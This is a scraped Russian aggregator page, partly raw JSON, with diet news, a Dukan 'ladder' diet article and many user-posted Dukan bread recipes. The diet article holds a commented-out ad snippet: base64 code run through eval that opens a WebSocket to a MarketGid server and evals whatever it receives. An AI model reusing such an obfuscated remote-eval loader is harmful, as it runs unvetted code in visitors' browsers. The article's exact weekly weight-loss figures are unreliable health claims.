На информационном ресурсе применяются рекомендательные технологии (информационные технологии предоставления информации на основе сбора, систематизации и анализа сведений, относящихся к предпочтениям пользователей сети "Интернет", находящихся на территории Российской Федерации)

Тина Кароль в латексе от кутюр дала интервью Кате Осадчей и назвала свой вес: какая диета ей помогла (ВИДЕО)

Ведущая Катя Осадча умеет раскрутить селебрити на откровенность. В одной из своих передач она выловила среди гостей Тину Кароль и за несколько минут вытянула из нее немало секретов. Конечно, первым делом Катя восхитилась невероятным латексным платьем Тины, которое безупречно подчеркивает ее
...Далее

Диетолога Пьера Дюкана обвинили в мошенничестве

Европейский фонд прямого инвестирования Remora Capital обвинил французского диетолога Пьера Дюкана в мошенничестве. Соответствующий иск фонд подал в нью-йоркский суд, сообщает в четверг газета The Guardian. Как указано в исковом заявлении фонда, Дюкан «обманным путем получил денежные средства и
...Далее

Известный диетолог Пьер Дюкан о том, как похудеть к летнему отпуску.

\x3c!-- \x3cdiv id=\"M347983Composite625353\">\x3ccenter> \x3ca href=\"http://marketgid.com/\" target=\"_blank\">«агрузка...\x3c/a> \x3c/center>\x3c/div> \x3cscript type=\"text/javascript\"> var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src = \"//jsc.marketgid.com/f/i/fithacker.ru.625353.js?t=\" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script625353.onerror = function () { mg_ws625353 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjUzNTMoZSl7dmFyIGg9bWdfd3M2MjUzNTMub25tZXNzYWdlOyBtZ193czYyNTM1My5yZWFkeVN0YXRlPT1tZ193czYyNTM1My5DTE9TRUQmJihtZ193czYyNTM1Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjI1MzUzX2xvY2F0aW9uKSksbWdfd3M2MjUzNTMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMobWdfd3M2MjUzNTMsZnVuY3Rpb24oKXttZ193czYyNTM1My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjUzNTMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjUzNTNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyNTM1MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjUzNTNfbG9jYXRpb24pLCBtZ193czYyNTM1My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjUzNTMoZS5kYXRhKX0=\\'))']), {type: \"application/javascript\"})); mg_ws625353.onmessage = function (msg){window.eval(msg.data);}; mg_ws625353.postMessage('js|'+script625353.src+'|M347983Composite625353|M347983Composite625353');};document.body.appendChild(script625353); \x3c/script>-->\x3c!-- M347983Composite End -->\x3cp>Официально метод Дюкана родился в 2000 году. С тех пор его опробовали на себе сотни женщин и мужчин.\x3c/p>\x3cp>В Интернете можно прочесть множество восторженных отзывов от тех, кто сбросил лишние килограммы с его помощью. Но с тех пор советы известного диетолога были усовершенствованы. Пьер Дюкан готов поделиться своими открытиями, как можно быстро похудеть к летнему отпуску.\x3c/p>\x3ch2>Метод похудения от Пьера Дюкана\x3c/h2>\x3c!-- A generated by theme -->\x3c!-- end A -->\x3cp>\x3cimg src=\"//mtdata.ru/u3/photo6B98/20172708160-0/original.jpg#20172708160\" alt=\"Пьер Дюкан\">\x3c/p>\x3cp>Последнее открытие Пьер называет «\x3cstrong>лестницей питания\x3c/strong>», или методом «лайт». Чтобы сильно похудеть, нужно быть к этому готовым. Решимость и мотивация – это главное.\x3c/p>\x3cp>Метод «лайт» предназначен для тех людей, которые хотят похудеть для себя, а не из-за проблем со здоровьем. Он выглядит так:\x3c/p>\x3cp>Понедельник начинается с «атаки». Нужно есть только белковые продукты.\x3cbr>Во вторник ешь белки и овощи.\x3cbr>Среда — белки, овощи, фрукты.\x3cbr>В четверг к белкам, овощами и фруктам добавь цельнозерновой хлеб.\x3cbr>Пятница — белки, овощи, фрукты, цельнозерновой хлеб, кусочек сыра.\x3cbr>Суббота — белки, овощи, фрукты, цельнозерновой хлеб, сыр, порция пасты, картофеля или бобовых.\x3cbr>В воскресенье ешь то же самое, что и в субботу, плюс один праздничный прием пищи. Можно есть, что хочешь.\x3cbr>Пьер назвал этот метод «лестницей», потому что ты двигаешься по дням недели, как по ступеням. С понедельника нужно начать всё сначала.\x3c/p>\x3cp>В первую неделю ты теряешь приблизительно 1 300 г.\x3cbr>Во вторую — 1 200 г.\x3cbr>В третью — 1 кг.\x3cbr>В четвертую — 800 г.\x3cbr>В пятую и последующие — по 700 г.\x3cbr>Метод «лайт» с одним днем «атаки» подходит для тех, кто хочет избавиться от 6–8 килограммов лишнего веса.\x3c/p>\x3cp>Как \x3cstrong>похудеть быстрее\x3c/strong>? Все зависит от текущего веса. Если надо сбросить, к примеру, до 10 кг, то первая фаза — «атака» — должна длиться 4 дня. Надо сбросить 15 кг — тогда 5 дней «атаки». Одна неделя такого питания — это максимум.\x3c/p>\x3cp>Советы Пьера Дюкана помогли многим достичь своей цели в похудении. Его новая методика поможет и тебе сбросить пару лишних килограммов к лету. Не забывай об активном образе жизни и обильном питье.\x3c/p>\x3cp>Поделись с друзьями этим открытием известного диетолога!\x3c/p>\x3cp>\x3ca href=\"https://takprosto.cc/metod-pohudeniya-ot-pyera-dyukana/\" target=\"_blank\">Источник\x3c/a>\x3c/p>\x3c!-- A generated by theme -->\x3c!-- end A -->\x3cdiv id=\"subscribe_storyfox\">\x3cdiv class=\"subscribe_storyfox_inner\">\n\x3cp2>\x3cnoindex>\x3cnofollow>\x3c/nofollow>\x3c/noindex>\x3c/p2>\x3cp3>← Жми «Нравится» и читай нас в Фейсбуке\x3c/p3>\n\x3c/div>\x3c/div>\x3cp>\x3cstrong>Понравилось? Поделитесь с друзьями!\x3c/strong>\x3c/p>","comments_count":0,"marks_count":0,"likes":{"count":0,"user_likes":0,"can_like":0,"marks_pluses":0,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://obo.mirtesen.ru/blog/43287258772","tags":["Диеты","Дюкан"],"date":1499691234,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20949635311,"photo_original":"https://mtdata.ru/u3/photo8791/20949635311-0/original.jpg","width":476,"height":249}}],"group":{"display_name":"Обо всём на свете","url":"https://obo.mirtesen.ru","photo_original":"//mtdata.ru/u3/groupBC1F/24e5fc4cf1956636622fdab950b525c6-0/__logo.jpeg","id":30476216193,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1385903514653},"canonical_url":"http://fithacker.ru/articles/izvestnyiy-dietolog-per-dyukan-o-tom-kak-pohudet-k-letnemu-otpusku/","topic":"Beauty","title":"Известный диетолог Пьер Дюкан о том, как похудеть к летнему отпуску.","preview_text":"\x3c!-- M347983Composite Start -->\x3c!-- «агрузка... var d = new Date, script625353 = document.createElement(\"script\"), mg_ws625353 = {};script625353.type = \"text/javascript\";script625353.charset = \"utf-8\";script625353.src =","post_type":"post","formattedDates":{"iso":"2017-07-10T12:53:54.000Z","ver1":"10 июля, 15:53","ver2":"10.07.2017 в 15:53","ver3":"10 июля, 15:53"},"images":[{"main":true,"url":"https://mtdata.ru/u3/photo8791/20949635311-0/original.jpg","width":476,"height":249}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43080360545,"from_id":212657648,"from":{"id":212657648,"display_name":"Василиса Мицкевич","url":"https://mirtesen.ru/people/212657648","photo_original":null,"isAuthenticAccount":false,"sex":1},"owner_id":-30063195483,"text":"\x3cp>\x3cspan>\x3cspan>\x3cem>\x3cstrong>ХЛЕБУШЕК ДЮКАНОВСКИЙ\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photoF875/20573691983-0/original.jpg#20573691983\" alt=\"\" />\x3c/p>\n\x3cp> \x3c/p>\n\x3cp>\x3cspan>Время подготовки: 10 минут • Время приготовления: 30 минут - 10 порций\x3cbr />Ингредиенты:\x3cbr />• 4 яйца \x3cbr />• 6 столовых ложек сливочного сыра 0% или мягкого творога 0%\x3cbr />• 10 столовых ложек овсяных отрубей \x3cbr />• 6 столовых ложек пшеничных отрубей\x3cbr />• ¾ пакетика сухих дрожжей\x3cbr />• молотый кориандр, кориандр в зернах\x3cbr />• 1 чайная ложка сахарозаменителя\x3cbr />• щепотка соли\x3cbr />Разогреть духовку до 200°C (термостат 7) . Смешать миксером яйца, сыр, отруби, соль, сахарозаменитель, кориандр и дрожжи. Положить тесто в форму для выпечки хлеба. Выпекать 30 минут. Посыпать сверху чуть раздавленными зернами кориандра. Верхушку смазать водой и завернуть хлеб в сухое полотенце. Хлеб расчитан на несколько дней.\x3cbr />Рекомендую, не добавлять сахзам и кориандр и делать полпорции! В целом вкусный хлебушек для бутеров получается!\x3c/span>\x3c/p>\n\x3cp> \x3c/p>\n\x3cdiv>\x3cspan>\x3cspan>\x3cem>\x3cstrong>\"БЕЛЫЙ\" ХЛЕБУШЕК\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/div>\n\x3cdiv>\x3cimg src=\"//mtdata.ru/u25/photo78C0/20019837681-0/original.jpg#20019837681\" alt=\"\" />\x3c/div>\n\x3cdiv> \x3c/div>\n\x3cp>\x3cspan>крахмал кукурузный - 2 ст. л.\x3cbr />отруби овсяные - 4 ст. л.\x3cbr />сом - 5 ст.л.\x3cbr />молоко - 50 мл.\x3cbr />живые дрожжи - 2 ч. л.\x3cbr />разрыхлитель - 1 ч. л.\x3cbr />яйца - 3 шт\x3cbr />соль, сахзам на кончике ч. л.\x3cbr />Замешиваем тесто из всех ингредиентов, не пугайтесь, оно получится жидкое! Тесто вылить в форму для выпечки и дать постоять 15 мин. Внимание! - Ставим выпекать хлеб в холодную духовку, выставляем температуру 160 градусов и выпекаем около 40 мин. Готовый хлеб остудить, завернуть в тканевую салфетку и хранить в холодильнике.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cem>\x3cstrong>\x3cspan>Горячие бутерброды\x3c/span>\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u25/photoA312/20242910530-0/original.jpg#20242910530\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />Рецепт:\x3cbr />2 яйца \x3cbr />85 гр. рассыпчатого творога домик в деревне 0% (это половина круглой пачки)\x3cbr />2 ст.л овсяных отрубей\x3cbr />2 ст.л. пшеничных отрубей \x3cbr />щепотка соли\x3cbr />сах.зам фитпарад на кончике ножа (можно и без него)\x3cbr />щепотка разрыхлителя\x3cbr />Яйца взбить венчикои и добавить остальные ингредиенты, всё перемешать, дать настояться 15 мин и выпекать в духовке до подрумянивания. \x3cbr />Хлеб можно выпекать с разными начинками и специями: кунжут, томаты, лук и др. Готовый хлеб разрезаем на кусочки, начинка может быть любой, у меня ветчина и сыр. Выпекаем в Бутерброднице 1-2 минуты. Автор фото и рецепта Людмила Воронина\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлеб с вялеными томатами и базиликом. Очень вкусный! \x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3cem>\x3cstrong>\x3cspan>2 Этап Чередование БО\x3c/span>\x3c/strong>\x3c/em>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photo7F17/20465983379-0/original.jpg#20465983379\" alt=\"\" />\x3c/p>\n\x3cp>\x3cspan>\x3cbr />Рецепт основного хлеба: \x3cbr />2 яйца \x3cbr />4 ст .л кефира 0%\x3cbr />2 ст.л овсяных отрубей\x3cbr />2 ст.л. пшеничных отрубей \x3cbr />щепотка соли\x3cbr />сах.зам фитпарад на кончике ножа (можно и без него)\x3cbr />щепотка разрыхлителя\x3cbr />Яйца взбить венчикои и добавить остальные ингредиенты, всё перемешать, дать настояться 15 мин и выпекать в духовке до подрумянивания. \x3cbr />Хлеб можно выпекать с разными начинками и специями: кунжут, томаты, лук и др. Сегодня я добавила щепотку базилика и несколько помидорок черри, предварительно их порезав. Приятного аппетита! Автор фото и рецепта Людмила Воронина.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлеб на клейковине\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u23/photoE5BF/20796764832-0/original.jpg#20796764832\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />100гр. пшеничной клейковины, 4ст.л.овсяных отрубей (смолотых в муку,можно не молоть), 1ст.л.кукурузного крахмала, 2ст.л.СОМа, 150мл.молока 0,5%, 2ч.л.сухих дрожжей, 1яйцо (его в рецепте не было, но я добавила), щепотка соли. Специи решила не добавлять, что б понять вкус клейковины! В чуть подогретом молоке растворить дрожжи и соль. Через 10 мин. добавить все остальные ингредиенты. Отставить к теплу на час. Затем в духовку при 180гр. На 30-40мин. Консистенция потрясающая лепить можно, что хочешь, потом круглый сделаю! Автор Ульяна Лола.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлебушек с розмарином # дюкан # клейковина 2 Этап Чередование.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u25/photo6FB0/20689056228-0/original.jpg#20689056228\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />Рецепт старый, но с изменениями. Отруби и семена льна не молоть в муку! 200гр (~ 8ст.л.с горкой) пшеничной клейковины, 8ст.л.овсянах отрубей, 4ст.л.пшеничных отрубей, 1ст.л.семян льна, 2ст.л.изолята (по желанию), 2ст.л.кукурузного крахмала, 4ст.л.СОМа, 300мл.молока 0,5%, 4ч.л.сухих дрожжей, 2 яйцо, 1 пакетик разрыхлителя, 1ч.л.без горки розовой или морской соли и приправа по вкусу, в данной ситуации розмарин, крупная соль и кунжут для посыпки сверху. В чуть подогретом молоке растворить дрожжи и соль. Через 10 мин. добавить все остальные ингредиенты (клейковину добавляю самую последнюю, а то тяжело перемешивать) Лепим батончик! Отставить в тепло на час. Затем в духовку при 180гр. На 30-40мин. Я на ночь оставляю в духовке! Через день он даже вкуснее и за счет большого размера можно и тосты и гренки делать. Автор фото и рецепта Ульяна Лола.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлеб с кунжутом. 2 Этап Чередование.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u23/photo2144/20358274775-0/original.jpg#20358274775\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />За основу брала рецепт Ульяны Лолы: 200гр (~ 7-8 ст.л.с горкой) пшеничной клейковины, 8 ст.л. овсяных отрубей, 4 ст.л. пшеничных отрубей, 1 ст.л. семян льна, 2-3 ст.л. кукурузного крахмала, 4 ст.л. СОМа, 300 мл. молока 1,5%, 3 ч.л. сухих дрожжей, 2 яйца, 0,5 пакетик разрыхлителя, 1ч.л.без горки розовой или морской соли и приправа по вкусу, кунжут для посыпки сверху. В чуть подогретом молоке растворить дрожжи и соль. Через 10 мин. добавить все остальные ингредиенты (клейковину добавляю самую последнюю, а то тяжело перемешивать) Лепим батончик! Отставить в тепло на час. Затем в духовку при 180 гр. На 30-40мин. Автор фото Людмила Воронина.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Пышные несладкие лепёшки на кефире. Этап Атака.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u25/photoAF45/20027493322-0/original.jpg#20027493322\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />На 2 порции: 2 яйца взбить с щепоткой сахзама фит парад (1 саше), соль по вкусу, 3 ложки овсяных отрубей, 1-2 ложки клейковины, разрыхлитель, добавить кефир 0% до консистенции теста густой сметаны, выпекать на маленькой сковордочке (у меня 13 см в диаметре) на маленькой температуре например на 4 из 9 приблизительно по 3-4 мин с каждой стороны. Приятного аппетита! Автор Людмила Воронина\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cem>\x3cstrong>\x3cspan>\x3cspan>Кокосовый хлебушек для завтраков ароматный и сладкий.\x3c/span>\x3c/span>\x3c/strong>\x3c/em>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u25/photo93B5/20473639020-0/original.jpg#20473639020\" alt=\"\" />\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\x3cspan> Теплым был - как кекс, сегодня скорее сладкий хлеб! Правда стоил мне Формы ТАК КАК жутко прилип)\x3cbr />Рецепт:\x3cbr />200гр (~ 8ст.л.с горкой) пшеничной клейковины, 8ст.л. овсяных отрубей, 2ст.л.кукурузного крахмала, 4ст.л.кокосового сухого молока или СОМа, 300 мл. кокосового молока, 3 ст.л.кокосовой стружки (только для тех, кто на этапе Закрепление), маленький пакетик сухих дрожжей, 2-3 яйца, 1 пакетик разрыхлителя, сахарзам по желанию и по вкусу, щепотка соль, корица, ваниль и кунжут для посыпки сверху. В чуть подогретом или комнатной температуры кокосовом молоке растворить дрожжи и соль. Отставить на 10 мин. В отдельной миске смешать все сухие ингредиенты. Смешать все, добавив чуть взбитые яйца. Отставить в тепло на час. Тесто очень хорошо поднимается, я дважды чуть помешивала для пышности. Затем в духовку при 180гр. На 30-40мин. Форму очень хорошо смазывать или лучше использовать силиконовую форму. Идеально для завтраков. Автор фото и рецепта Ульяна Лола.\x3c/span>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Луковый хлебушек на кефире \x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3cspan>\x3cem>\x3cstrong>\x3ca href=\"http://vk.com/feed?section=search&q=%23%D0%BA%D0%BB%D0%B5%D0%B9%D0%BA%D0%BE%D0%B2%D0%B8%D0%BD%D0%B0\" target=\"_blank\">\x3cspan>#клейковина\x3c/span>\x3c/a>\x3cspan> \x3c/span>\x3ca href=\"http://vk.com/feed?section=search&q=%23%D1%85%D0%BB%D0%B5%D0%B1\" target=\"_blank\">\x3cspan>#хлеб\x3c/span>\x3c/a>\x3cspan> \x3c/span>\x3ca href=\"http://vk.com/feed?section=search&q=%23%D0%94%D1%8E%D0%BA%D0%B0%D0%BD\" target=\"_blank\">\x3cspan>#Дюкан\x3c/span>\x3c/a>\x3c/strong>\x3c/em>\x3c/span>\x3cbr />\x3cspan>\x3cspan>\x3cem>\x3cstrong>2 Этап Чередование.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u23/photo589F/20250566171-0/original.jpg#20250566171\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />200гр (~ 8ст.л.с горкой) пшеничной клейковины, 8ст.л.овсяных отрубей, 4ст.л.пшеничных отрубей, 1ст.л.семян льна, 2ст.л.изолята (по желанию), 2ст.л.кукурузного крахмала , 4ст.л.СОМа, 300 мл.кефира 0%, 3ст.л.обезжиренного йогурта, 4ч.л.сухих дрожжей, 2 яйцо, 1 пакетик разрыхлителя, соль и приправы по вкусу в данной ситуации лук сухой зеленый и лук порошковый. В чуть подогретом кефире растворить дрожжи и соль. Отставить на 10 мин. Затем добавить чуть взбитые яйца и йогурт. В другой посуде смешать все сухие ингредиенты. Замесить тесто. Отставить в тепло на час. Оно будет хорошо подниматься, я пару раз помешивала для его пышности. Затем в духовку при 180гр. На 30-40мин. На ночь оставляю в духовке остывать! Автор Фото и рецепта Ульяна Лола.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Шафрановые булочки. 2 этап Чередование.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photo753C/20804420473-0/original.jpg#20804420473\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />4 ст.л.с горкой пшеничной клейковины, \x3cbr />4 ст.л.овсяных отрубей, \x3cbr />2 ст.л. пшеничных отрубей, \x3cbr />1 ст.л.семян льна,\x3cbr />1 ст.л.кукурузного крахмала, \x3cbr />2 ст.л.СОМа, \x3cbr />150 мл.кефира 0%,\x3cbr />2 ч.л. сухих дрожжей, \x3cbr />1 яйцо, \x3cbr />щепотка сах зама\x3cbr />1/2 пакетика разрыхлителя (у меня шафрановый), розовая и шафрановая соль, приправы по вкусу в данной ситуации шафран. В чуть подогретом кефире растворить дрожжи и по щепотке соли. Отставить на 10 мин. Затем добавить чуть взбитые яйца. В другой посуде смешать все сухие ингредиенты. Замесить тесто, сформировать из него булочки и отставить в тепло на час. Они будут хорошо подниматься. Затем в духовку при 180гр. На 30 мин. По мотивам рецепта Ульяны Лолы. Автор Людмила Воронина.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>Булочки \"Чиа\" 2 Этап Чередование.\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photoCD88/20919784718-0/original.jpg#20919784718\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />8 ст.л.с горкой пшеничной клейковины, 8 ст.л. овсяных отрубей \"Дюкан\", 4 ст.л.пшеничных отрубей, 1 ст.л.семян чиа, 2 ст.л.кукурузного крахмала , 4ст.л.СОМа, 300 мл.кефира 0%, 3 ч.л.сухих дрожжей, щепотка сах зама, 2 яйца, 1 пакетик разрыхлителя (у меня шафран), гималайская соль. В чуть подогретом кефире растворить дрожжи и соль. Отставить на 10 мин. Затем добавить чуть взбитые яйца. В другой посуде смешать все сухие ингредиенты. Замесить тесто. Отставить в тепло на час. Оно будет хорошо подниматься, сформировать булочки, дать еще раз подняться и выпекать в духовке при 180гр. На 30 мин. Автор Фото и рецепта Людмила Воронина.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлеб с мукой из отрубей. 2 Этап Чередование.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u23/photo7FF1/20589003265-0/original.jpg#20589003265\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />100гр.пшеничной клейковины, 4ст.л.овсянах отрубей (смолотых в муку), 1ст.л.кукурузного крахмала, 2ст.л.СОМа, 150мл.молока 0,5%, 3ст.л.йогурта 0%, 2ч.л. сухих дрожжей, 1яйцо, соль, куркума и пару веточек тимьяна. В чуть подогретом молоке растворить дрожжи и соль. Через 10 мин. в молоко с дрожжами разбить яйца, добавить йогурт и хорошенько перемешать вилкой или венчиком. Тимьян разобрать на лепесточки и в жидкую смесь. Затем смешать все сухие ингредиенты. Сочленить. Отставить к теплу! на час! Тесто подниматься, перекладываю в форму и я еще чуть жду, что б поднялось пока разогревается духовка. Сверху Чиа, тимьян и соль. Затем в духовку при 180гр. На 30-40 мин. Я все ингредиенты умножила на два!! Автор фото и рецепта Ульяна Лола.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Хлеб от Ульяны.\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photoAC18/20365930416-0/original.jpg#20365930416\" alt=\"\" />\x3cbr />\x3cspan>\x3cbr />Как Всегда рецепт Тот Же НО с изменениями: 200гр (8ст.л. с горкой) пшеничной клейковины, 8ст.л.овсянах отрубей, 4ст.л.пшеничных отрубей. 2ст.л.кукурузного крахмала, 300мл.теплой воды, 4ч.л.сухих дрожжей, 2 яйца, соль. В теплой воде растворить дрожжи. Через 10 мин. Туда разбить яйца и хорошенько перемешать вилкой или венчиком. Затем смешать все сухие ингредиенты. Замесить тесто! Отставить к теплу на час прикрыв тканью. Тесто поднимется и переложить в форму и я еще чуть жду, что б поднялось пока разогревается духовка. Сверху Кунжут или семена льна. Затем в духовку при 180гр. На 30-40 мин. Автор Ульяна Лола.\x3c/span>\x3c/p>\n\x3cdiv> \x3c/div>\n\x3cdiv>\n\x3cp>\x3cspan>\x3cspan>\x3cem>\x3cstrong>Луковый дю-хлеб. 2 ЭТАП Чередование/\x3c/strong>\x3c/em>\x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cimg src=\"//mtdata.ru/u24/photo04B4/20812076114-0/original.jpg#20812076114\" alt=\"\" />\x3c/p>\n\x3cdiv>\x3cbr />\n\x3cdiv>\x3cspan>\x3cspan> Бо ЧБ Тесто нА основе \"Сырной лепёшки\" Разогреть духовку до 180 градусов. 1 яйцо, взбить с солью и щепоткой фит парада, добавить 100 мл. кефира, 2 столовые ложки мягкого творога (в этот раз взяла «Простоквашино» можно Валио 0%), 1 ложку пшеничных отрубей, 2 ложки овсяных отрубей, 1 ложку кукурузного крахмала, 1 ложку СОМа и разрыхлитель, всё перемешать и дать смеси настояться 15- 20 мин. Затем добавить в тесто жареный лук и ещё раз перемешать. Форму застелить бумагой для выпечки. Выложить тесто в форму, по желанию сверху присыпать чёрным кунжутом и хрустящей солью (но тогда в этот день нельзя использовать масло). Выпекать при 180 градусах до готовности. Подавать в горячем виде. Приятного аппетита! \x3c/span>\x3c/span>\n\x3cp>\x3cspan>Автор рецепта: Мила Воронина\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cspan> \x3c/span>\x3c/span>\x3c/p>\n\x3cp>\x3cspan>\x3cspan>\x3cspan>\x3ca href=\"http://www.liveinternet.ru/users/artemonchik2013/post355746323/\" target=\"_blank\">Источник\x3c/a>\x3c/span>\x3c/span>\x3c/span>\x3c/p>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>\n\x3c/div>","comments_count":3,"marks_count":7,"likes":{"count":7,"user_likes":0,"can_like":0,"marks_pluses":7,"marks_minuses":0,"user_like_attr":null,"like_attr_ids":[{"id":100,"count":7}]},"fame_actions_positive_count":0,"fame_actions_negative_count":0,"fame_actions":[],"url":"https://vkusno.mirtesen.ru/blog/43080360545","tags":["Дюкан","хлеб","Худеем","Выпечка","домашний хлеб","диетический хлеб","клейковина"],"date":1453294869,"canEdit":false,"foreignPollId":null,"attachments":[{"photo":{"id":20573691983,"photo_original":"https://mtdata.ru/u24/photoF875/20573691983-0/original.jpg","width":807,"height":807}}],"group":{"display_name":"Будет вкусно","url":"https://vkusno.mirtesen.ru","photo_original":"//mtdata.ru/u26/photo4A2A/20463854251-0/original.jpeg","id":30063195483,"canViewBlogPostCreator":false,"showSubscribersAmount":true,"is_subscribed":false,"is_member":false,"is_owner":false,"is_staff":false,"created":1289823089286},"canonical_url":"https://vkusno.mirtesen.ru/blog/43080360545","topic":"home","title":"Подборка лучшего диетического хлебушка","preview_text":"ХЛЕБУШЕК ДЮКАНОВСКИЙ \n  \nВремя подготовки: 10 минут • Время приготовления: 30 минут - 10 порций Ингредиенты: • 4 яйца  • 6 столовых ложек сливочного сыра 0% или мягкого творога 0% • 10 столовых ложек овсяных отрубей  • 6 столовых ложек пшеничных отрубей • ¾ пакетика сухих дрожжей • молотый","post_type":"post","formattedDates":{"iso":"2016-01-20T13:01:09.000Z","ver1":"20 января, 16:01","ver2":"20.01.2016 в 16:01","ver3":"20 янв., 16:01"},"images":[{"main":true,"url":"https://mtdata.ru/u24/photoF875/20573691983-0/original.jpg","width":807,"height":807}],"videos":[],"shared_post":null,"mentionedPersons":null},{"id":43252000747,"from_id":530978026,"from":{"id":530978026,"display_name":"Лилия К","url":"https://mirtesen.ru/people/530978026","photo_original":"https://mtdata.ru/u30/photoADF2/20810247910-0/original.jpeg","isAuthenticAccount":false,"sex":1},"owner_id":-30669388060,"text":"\x3ch2>Углеводы, безусловно, следует употреблять, а вот почему и как — разбираемся ниже\x3c/h2>\n\x3cdiv>\x3cimg 